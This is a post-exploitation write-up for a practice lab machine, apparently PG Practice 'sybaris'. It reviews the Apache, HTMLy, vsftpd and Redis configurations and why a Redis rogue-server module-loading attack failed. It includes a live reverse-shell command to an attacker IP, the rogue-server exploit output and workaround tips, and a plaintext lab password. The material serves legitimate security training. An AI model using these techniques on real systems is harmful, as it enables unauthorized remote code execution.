Beyond


This is the "beyond" page: additional post-exploitation enumeration and assessment performed as the root user after the target system has been compromised. The goal is to record how the services were configured and why the earlier attack steps succeeded or failed.

Apache


[root@sybaris etc]# systemctl status httpd.service
 httpd.service - The Apache HTTP Server
   Loaded: loaded (/usr/lib/systemd/system/httpd.service; enabled; vendor preset: disabled)
   Active: active (running) since Fri 2024-08-02 13:10:06 EDT; 7 months 25 days ago
     Docs: man:httpd(8)
           man:apachectl(8)
 Main PID: 905 (httpd)
   Status: "Total requests: 0; Current requests/sec: 0; Current traffic:   0 B/sec"
   CGroup: /system.slice/httpd.service
           ├─ 905 /usr/sbin/httpd -DFOREGROUND
           ├─1080 /usr/sbin/httpd -DFOREGROUND
           ├─1081 /usr/sbin/httpd -DFOREGROUND
           ├─1082 /usr/sbin/httpd -DFOREGROUND
           ├─1083 /usr/sbin/httpd -DFOREGROUND
           └─1084 /usr/sbin/httpd -DFOREGROUND
 
 
[root@sybaris etc]# cat /usr/lib/systemd/system/httpd.service
[Unit]
Description=The Apache HTTP Server
After=network.target remote-fs.target nss-lookup.target
Documentation=man:httpd(8)
Documentation=man:apachectl(8)
 
[Service]
Type=notify
EnvironmentFile=/etc/sysconfig/httpd
ExecStart=/usr/sbin/httpd $OPTIONS -DFOREGROUND
ExecReload=/usr/sbin/httpd $OPTIONS -k graceful
ExecStop=/bin/kill -WINCH ${MAINPID}
# We want systemd to give httpd some time to finish gracefully, but still want
# it to kill httpd after TimeoutStopSec if something went wrong during the
# graceful stop. Normally, Systemd sends SIGTERM signal right after the
# ExecStop, which would kill httpd. We are sending useless SIGCONT here to give
# httpd time to finish.
KillSignal=SIGCONT
PrivateTmp=true
 
[Install]
WantedBy=multi-user.target
[root@sybaris etc]# cat httpd/conf/httpd.conf | grep -v '^[#/]'
 
ServerRoot "/etc/httpd"
 
Listen 80
 
Include conf.modules.d/*.conf
 
User apache
Group apache
 
 
ServerAdmin root@localhost
 
 
<Directory />
    AllowOverride none
    Require all denied
</Directory>
 
 
DocumentRoot "/var/www/html"
 
<Directory "/var/www">
    AllowOverride None
    Require all granted
</Directory>
 
<Directory "/var/www/html">
    Options Indexes FollowSymLinks
    AllowOverride None
    Require all granted
</Directory>
 
<IfModule dir_module>
    DirectoryIndex index.html
</IfModule>
 
<Files ".ht*">
    Require all denied
</Files>
 
ErrorLog "logs/error_log"
 
LogLevel warn
 
<IfModule log_config_module>
    LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
    LogFormat "%h %l %u %t \"%r\" %>s %b" common
 
    <IfModule logio_module>
      LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio
    </IfModule>
    CustomLog "logs/access_log" combined
</IfModule>
 
<IfModule alias_module>
    ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"
 
</IfModule>
 
<Directory "/var/www/cgi-bin">
    AllowOverride None
    Options None
    Require all granted
</Directory>
 
<IfModule mime_module>
    TypesConfig /etc/mime.types
    AddType application/x-compress .Z
    AddType application/x-gzip .gz .tgz
    AddType text/html .shtml
    AddOutputFilter INCLUDES .shtml
</IfModule>
 
AddDefaultCharset UTF-8
 
<IfModule mime_magic_module>
    MIMEMagicFile conf/magic
</IfModule>
 
 
EnableSendfile on
 
IncludeOptional conf.d/*.conf
[root@sybaris etc]# cat httpd/conf.d/sybaris.conf
<virtualhost *:80>
    ServerName sybaris
    ServerAlias sybaris
    ServerAdmin admin@example.com
    DocumentRoot /var/www/html
    <Directory "/var/www/html">
        Options FollowSymLinks Indexes
        AllowOverride All
        Order Allow,Deny
        Allow from all
        DirectoryIndex index.php
    </Directory>
</VirtualHost>

Web

Note that the virtual host in conf.d/sybaris.conf overrides the stricter settings from httpd.conf for /var/www/html: it enables `AllowOverride All` (so the shipped .htaccess is honoured), keeps `Indexes` (directory listing), and uses the Apache 2.2-style `Order Allow,Deny` / `Allow from all` directives, which only work through mod_access_compat on 2.4.


[root@sybaris etc]# cd /var/www
[root@sybaris www]# ll
total 8.0K
4.0K drwxr-xr-x.  8 root root 4.0K Sep  4  2020 html
   0 drwxr-xr-x.  4 root root   33 Sep  4  2020 .
4.0K drwxr-xr-x. 21 root root 4.0K Sep  4  2020 ..
   0 drwxr-xr-x.  2 root root    6 Apr  2  2020 cgi-bin
[root@sybaris www]# ll cgi-bin/
total 0
0 drwxr-xr-x. 4 root root 33 Sep  4  2020 ..
0 drwxr-xr-x. 2 root root  6 Apr  2  2020 .
[root@sybaris www]# ll html
total 84K
   0 drwxrwxr-x. 3 root root   54 Sep  4  2020 config
4.0K drwxr-xr-x. 8 root root 4.0K Sep  4  2020 .
   0 drwxr-xr-x. 4 root root   33 Sep  4  2020 ..
8.0K -rw-rw-r--. 1 root root 5.6K May  6  2020 .htaccess
4.0K -rw-rw-r--. 1 root root   21 May  6  2020 .updateignore
4.0K -rw-rw-r--. 1 root root 1.8K May  6  2020 COPYRIGHT.txt
 20K -rw-rw-r--. 1 root root  18K May  6  2020 LICENSE.txt
8.0K -rw-rw-r--. 1 root root 8.0K May  6  2020 README.md
   0 drwxrwxr-x. 2 root root   35 May  6  2020 cache
4.0K -rw-rw-r--. 1 root root  507 May  6  2020 composer.json
 12K -rw-rw-r--. 1 root root 8.9K May  6  2020 composer.lock
   0 drwxrwxr-x. 2 root root   22 May  6  2020 content
4.0K -rw-rw-r--. 1 root root 1.2K May  6  2020 favicon.ico
4.0K -rw-rw-r--. 1 root root 1.2K May  6  2020 humans.txt
4.0K -rw-rw-r--. 1 root root  108 May  6  2020 index.php
   0 drwxrwxr-x. 2 root root   62 May  6  2020 lang
4.0K -rw-rw-r--. 1 root root 1.2K May  6  2020 robots.txt
   0 drwxrwxr-x. 8 root root  113 May  6  2020 system
   0 drwxrwxr-x. 8 root root  118 May  6  2020 themes
4.0K -rw-rw-r--. 1 root root 1.6K May  6  2020 upload.php

config

The HTMLy user file below stores the admin password in plaintext. Since `pablo` is also a local account and the user the Redis service runs as, this credential should be checked for reuse against SSH, FTP and any other service on the host.


[root@sybaris config]# cat config.ini | grep -v '^[#/]'
site.url = "/"
timezone = "Asia/Jakarta"
time.format = "d F Y"
language = "en"
blog.title = "Sybaris"
blog.tagline = "Just another HTMLy blog"
blog.description = "Proudly powered by HTMLy, a databaseless blogging platform."
blog.copyright = "(c) Pablo."
permalink.type = "default"
blog.enable = "false"
social.twitter = "https://twitter.com"
social.facebook = "https://www.facebook.com"
social.tumblr = "http://www.tumblr.com"
blog.menu = ""
breadcrumb.home = "Home"
comment.system = "disable"
fb.appid = ""
fb.num = "5"
fb.color = "light"
disqus.shortname = ""
google.wmt.id = ""
google.publisher = ""
google.analytics.id = ""
google.reCaptcha = "false"
google.reCaptcha.public = ""
google.reCaptcha.private = ""
posts.perpage = "10"
category.perpage = "10"
tag.perpage = "10"
archive.perpage = "10"
search.perpage = "10"
profile.perpage = "10"
type.perpage = "10"
json.count = "10"
category.info = "true"
related.count = "3"
recent.count = "5"
popular.count = "5"
author.info = "true"
teaser.type = "full"
read.more = "Read more"
teaser.char = "200"
description.char = "150"
rss.count = "10"
rss.char = "200"
img.thumbnail = "false"
default.thumbnail = ""
views.counter = "false"
sitemap.priority.base = "1.0"
sitemap.priority.post = "0.5"
sitemap.priority.static = "0.5"
sitemap.priority.category = "0.5"
sitemap.priority.tag = "0.5"
sitemap.priority.archiveDay = "0.5"
sitemap.priority.archiveMonth = "0.5"
sitemap.priority.archiveYear = "0.5"
sitemap.priority.author = "0.5"
sitemap.priority.type = "0.5"
prerelease = "false"
cache.expiration = "6"
cache.off = "false"
generation.time = "false"
cache.timestamp = "false"
views.root = "themes/twentysixteen"
views.layout = "layout"
 
[root@sybaris config]# cat users/pablo.ini 
password = PostureAlienateArson345
role = admin

FTP


[root@sybaris etc]# ll /etc/vsftpd/
total 28K
 12K drwxr-xr-x. 81 root root 8.0K Mar 29 10:08 ..
4.0K -rw-------.  1 root root  189 Sep  4  2020 vsftpd.conf
   0 drwxr-xr-x.  2 root root   88 Sep  4  2020 .
4.0K -rw-------.  1 root root  125 Apr  1  2020 ftpusers
4.0K -rw-------.  1 root root  361 Apr  1  2020 user_list
4.0K -rwxr--r--.  1 root root  338 Apr  1  2020 vsftpd_conf_migrate.sh

vsftpd.conf

Anonymous login and anonymous upload are both enabled, and `anon_umask=000` means files uploaded to /var/ftp are created world-writable (mode 0666). Combined with `allow_writeable_chroot=YES`, this gives any unauthenticated client a writable location on the target's filesystem.


[root@sybaris etc]# cat /etc/vsftpd/vsftpd.conf 
listen=YES
anonymous_enable=YES
write_enable=YES
anon_upload_enable=YES
anon_root=/var/ftp
allow_writeable_chroot=YES
anon_umask=000
pasv_enable=Yes
pasv_min_port=10090
pasv_max_port=10100

users


[root@sybaris etc]# cat /etc/vsftpd/ftpusers
# Users that are not allowed to login via ftp
root
bin
daemon
adm
lp
sync
shutdown
halt
mail
news
uucp
operator
games
nobody
 
 
[root@sybaris etc]# cat /etc/vsftpd/user_list
# vsftpd userlist
# If userlist_deny=NO, only allow users in this file
# If userlist_deny=YES (default), never allow users in this file, and
# do not even prompt for a password.
# Note that the default vsftpd pam config also checks /etc/vsftpd/ftpusers
# for users that are denied.
root
bin
daemon
adm
lp
sync
shutdown
halt
mail
news
uucp
operator
games
nobody

Redis


[root@sybaris etc]# systemctl status redis.service
 redis.service - Redis
   Loaded: loaded (/usr/lib/systemd/system/redis.service; enabled; vendor preset: disabled)
   Active: active (running) since Fri 2024-08-02 13:10:05 EDT; 7 months 25 days ago
 Main PID: 909 (redis-server)
   CGroup: /system.slice/redis.service
           ├─ 909 /usr/local/bin/redis-server 0.0.0.0:6379
           ├─1737 bash -c bash -i >& /dev/tcp/192.168.45.218/6379 0>&1
           └─1738 bash -i
 
 
 
[root@sybaris etc]# cat /usr/lib/systemd/system/redis.service
[Unit]
Description=Redis
After=network.target
 
[Service]
User=pablo
Group=pablo
ExecStart=/usr/local/bin/redis-server /etc/redis/redis.conf
ExecStop=/usr/local/bin/redis-cli shutdown
Restart=always
 
[Install]
WantedBy=multi-user.target
 
 
 
[root@sybaris etc]# cat /etc/redis/redis.conf
bind 0.0.0.0
protected-mode no
port 6379
tcp-backlog 511
timeout 0
tcp-keepalive 300
supervised no
pidfile /var/run/redis/redis-server.pid
loglevel notice
logfile /var/log/redis/redis-server.log
databases 16

LOAD MODULE


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris]
└─$ redis-cli -h $IP MODULE LOAD /home/kali/PEN-200/PG_PRACTICE/sybaris/RedisModules-ExecuteCommand/module.so
(error) ERR Error loading the extension. Please check the server logs..

Failed

[root@sybaris etc]# tail -n 2 /var/log/redis/redis-server.log
17957:M 29 Mar 2025 10:23:02.769 * Ready to accept connections
17957:M 29 Mar 2025 10:28:41.968 # Module /home/kali/PEN-200/PG_PRACTICE/sybaris/RedisModules-ExecuteCommand/module.so failed to load: /home/kali/PEN-200/PG_PRACTICE/sybaris/RedisModules-ExecuteCommand/module.so: cannot open shared object file: No such file or directory

As expected, `MODULE LOAD` resolves the path on the Redis server's own filesystem, not the client's: the log shows redis-server trying to open the Kali path locally and failing with "No such file or directory". The module therefore has to be written to the target first (which is what the rogue-server/replication technique below attempts).

Rogue Redis Server


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris/redis-rogue-server]
└─$ python3 redis-rogue-server.py --rhost=$IP --lhost=$tun0 --lport=6379 -v
/home/kali/PEN-200/PG_PRACTICE/sybaris/redis-rogue-server/redis-rogue-server.py:10: SyntaxWarning: invalid escape sequence '\ '
  BANNER = """______         _ _      ______                         _____
______         _ _      ______                         _____                          
| ___ \       | (_)     | ___ \                       /  ___|                         
| |_/ /___  __| |_ ___  | |_/ /___   __ _ _   _  ___  \ `--.  ___ _ ____   _____ _ __ 
|    // _ \/ _` | / __| |    // _ \ / _` | | | |/ _ \  `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \  __/ (_| | \__ \ | |\ \ (_) | (_| | |_| |  __/ /\__/ /  __/ |   \ V /  __/ |   
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_|    \_/ \___|_|   
                                     __/ |                                            
                                    |___/                                             
@copyright n0b0dy @ r3kapig
 
[info] TARGET 192.168.185.93:6379
[info] SERVER 192.168.45.218:6379
[info] Setting master...
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$14\r\n192.168.45.218\r\n$4\r\n6379\r\n'
[->] b'+OK\r\n'
[info] Setting dbfilename...
[<-] b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n'
[->] b'+OK\r\n'
[->] b'*1\r\n$4\r\nPING\r\n'
[<-] b'+PONG\r\n'
[->] b'*3\r\n$8\r\nREPLCONF\r\n$14\r\nlistening-port\r\n$4\r\n6379\r\n'
[<-] b'+OK\r\n'
[->] b'*5\r\n$8\r\nREPLCONF\r\n$4\r\ncapa\r\n$3\r\neof\r\n$4\r\ncapa\r\n$6\r\npsync2\r\n'
[<-] b'+OK\r\n'
[->] b'*3\r\n$5\r\nPSYNC\r\n$40\r\n008b776f1b3180ee407ac27383b491319bd70ea9\r\n$1\r\n1\r\n'
[<-] b'+FULLRESYNC ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ 1\r\n$44320\r\n\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00'......b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00J\xa6\x00\x00\x00\x00\x00\x00\xd3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\n'
[info] Loading module...
[<-] b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n'
[->] b'-ERR Error loading the extension. Please check the server logs.\r\n'
[info] Temerory cleaning up...
[<-] b'*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n'
[->] b'+OK\r\n'
[<-] b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$8\r\ndump.rdb\r\n'
[->] b'+OK\r\n'
[<-] b'*2\r\n$11\r\nsystem.exec\r\n$11\r\nrm ./exp.so\r\n'
[->] b'-ERR unknown command `system.exec`, with args beginning with: `rm ./exp.so`, \r\n'
What do u want, [i]nteractive shell or [r]everse shell: 

Failed to load the exp.so module. The server log explains why: "Opening the temp file needed for MASTER <-> REPLICA synchronization: Permission denied". The replica could not write the received RDB payload (our exp.so) to disk, so the subsequent `MODULE LOAD ./exp.so` failed with "No such file or directory". redis.service runs as the unprivileged user `pablo` (User=pablo in the unit file) and redis.conf sets no `dir`, so the payload is written relative to the process working directory, which pablo evidently cannot write to. Because `CONFIG SET` is accepted by this server, pointing `dir` at a directory writable by pablo before starting replication would presumably avoid this failure — worth confirming on a lab host.

[root@sybaris etc]# cat /var/log/redis/redis-server.log
 
[...REDACTED...]
 
17957:S 29 Mar 2025 10:33:14.700 * Connecting to MASTER 192.168.45.218:6379
17957:S 29 Mar 2025 10:33:14.700 * MASTER <-> REPLICA sync started
17957:S 29 Mar 2025 10:33:14.724 # Error condition on socket for SYNC: Connection refused
17957:S 29 Mar 2025 10:33:15.702 * Connecting to MASTER 192.168.45.218:6379
17957:S 29 Mar 2025 10:33:15.702 * MASTER <-> REPLICA sync started
17957:S 29 Mar 2025 10:33:15.721 # Error condition on socket for SYNC: Connection refused
17957:S 29 Mar 2025 10:33:16.704 * Connecting to MASTER 192.168.45.218:6379
17957:S 29 Mar 2025 10:33:16.704 * MASTER <-> REPLICA sync started
17957:S 29 Mar 2025 10:33:16.726 * Non blocking connect for SYNC fired the event.
17957:S 29 Mar 2025 10:33:16.750 * Master replied to PING, replication can continue...
17957:S 29 Mar 2025 10:33:16.786 * Trying a partial resynchronization (request 008b776f1b3180ee407ac27383b491319bd70ea9:1).
17957:S 29 Mar 2025 10:33:16.804 * Full resync from master: ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ:1
17957:S 29 Mar 2025 10:33:16.804 * Discarding previously cached master state.
17957:S 29 Mar 2025 10:33:21.805 # Opening the temp file needed for MASTER <-> REPLICA synchronization: Permission denied
17957:S 29 Mar 2025 10:33:21.805 # Module ./exp.so failed to load: ./exp.so: cannot open shared object file: No such file or directory
17957:M 29 Mar 2025 10:33:21.836 # Setting secondary replication ID to 008b776f1b3180ee407ac27383b491319bd70ea9, valid up to offset: 1. New replication ID is b9b570113dbdae11f2c543cc5ebf855f335f9ec3
17957:M 29 Mar 2025 10:33:21.836 * MASTER MODE enabled (user request from 'id=8 addr=192.168.45.218:60768 fd=7 name= age=7 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=34 qbuf-free=32734 obl=0 oll=0 omem=0 events=r cmd=slaveof')

17957:S 29 Mar 2025 10:33:21.805 # Module ./exp.so failed to load: ./exp.so: cannot open shared object file: No such file or directory